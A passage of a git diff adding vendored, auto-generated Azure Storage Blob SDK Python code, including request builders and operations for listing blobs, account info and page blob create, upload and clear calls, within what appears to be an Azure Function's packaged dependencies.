retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify one or more datasets to include in the + response. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListBlobsHierarchySegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListBlobsHierarchySegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsHierarchySegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_blob_hierarchy_segment_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + delimiter=delimiter, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_blob_hierarchy_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('ListBlobsHierarchySegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_blob_hierarchy_segment.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs # type: Any + ): + # type: (...) -> None + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}/{containerName}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_page_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_page_blob_operations.py new file mode 100644 index 0000000..772653a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_page_blob_operations.py @@ -0,0 +1,2166 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_create_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + blob_type = kwargs.pop('blob_type', "PageBlob") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + blob_content_length = kwargs.pop('blob_content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.PremiumPageBlobAccessTier"]] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + blob_sequence_number = kwargs.pop('blob_sequence_number', 0) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-blob-type'] = _SERIALIZER.header("blob_type", blob_type, 'str') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-blob-content-length'] = _SERIALIZER.header("blob_content_length", blob_content_length, 'long') + if blob_sequence_number is not None: + _header_parameters['x-ms-blob-sequence-number'] = _SERIALIZER.header("blob_sequence_number", blob_sequence_number, 'long') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_upload_pages_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + content_length = kwargs.pop('content_length') # type: int + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_sequence_number_less_than_or_equal_to = kwargs.pop('if_sequence_number_less_than_or_equal_to', None) # type: Optional[int] + if_sequence_number_less_than = kwargs.pop('if_sequence_number_less_than', None) # type: Optional[int] + if_sequence_number_equal_to = kwargs.pop('if_sequence_number_equal_to', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-page-write'] = _SERIALIZER.header("page_write", page_write, 'str') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_sequence_number_less_than_or_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-le'] = _SERIALIZER.header("if_sequence_number_less_than_or_equal_to", if_sequence_number_less_than_or_equal_to, 'long') + if if_sequence_number_less_than is not None: + _header_parameters['x-ms-if-sequence-number-lt'] = _SERIALIZER.header("if_sequence_number_less_than", if_sequence_number_less_than, 'long') + if if_sequence_number_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-eq'] = _SERIALIZER.header("if_sequence_number_equal_to", if_sequence_number_equal_to, 'long') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_clear_pages_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "clear") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_sequence_number_less_than_or_equal_to = kwargs.pop('if_sequence_number_less_than_or_equal_to', None) # type: Optional[int] + if_sequence_number_less_than = kwargs.pop('if_sequence_number_less_than', None) # type: Optional[int] + if_sequence_number_equal_to = kwargs.pop('if_sequence_number_equal_to', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-page-write'] = _SERIALIZER.header("page_write", page_write, 'str') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_sequence_number_less_than_or_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-le'] = _SERIALIZER.header("if_sequence_number_less_than_or_equal_to", if_sequence_number_less_than_or_equal_to, 'long') + if if_sequence_number_less_than is not None: + _header_parameters['x-ms-if-sequence-number-lt'] = _SERIALIZER.header("if_sequence_number_less_than", if_sequence_number_less_than, 'long') + if if_sequence_number_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-eq'] = _SERIALIZER.header("if_sequence_number_equal_to", if_sequence_number_equal_to, 'long') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_upload_pages_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + source_url = kwargs.pop('source_url') # type: str + source_range = kwargs.pop('source_range') # type: str + content_length = kwargs.pop('content_length') # type: int + range = kwargs.pop('range') # type: str + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + source_contentcrc64 = kwargs.pop('source_contentcrc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_sequence_number_less_than_or_equal_to = kwargs.pop('if_sequence_number_less_than_or_equal_to', None) # type: Optional[int] + if_sequence_number_less_than = kwargs.pop('if_sequence_number_less_than', None) # type: Optional[int] + if_sequence_number_equal_to = kwargs.pop('if_sequence_number_equal_to', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-page-write'] = _SERIALIZER.header("page_write", page_write, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("source_url", source_url, 'str') + _header_parameters['x-ms-source-range'] = _SERIALIZER.header("source_range", source_range, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if source_contentcrc64 is not None: + _header_parameters['x-ms-source-content-crc64'] = _SERIALIZER.header("source_contentcrc64", source_contentcrc64, 'bytearray') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_sequence_number_less_than_or_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-le'] = _SERIALIZER.header("if_sequence_number_less_than_or_equal_to", if_sequence_number_less_than_or_equal_to, 'long') + if if_sequence_number_less_than is not None: + _header_parameters['x-ms-if-sequence-number-lt'] = _SERIALIZER.header("if_sequence_number_less_than", if_sequence_number_less_than, 'long') + if if_sequence_number_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-eq'] = _SERIALIZER.header("if_sequence_number_equal_to", if_sequence_number_equal_to, 'long') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_page_ranges_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "pagelist") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + + # Construct headers + 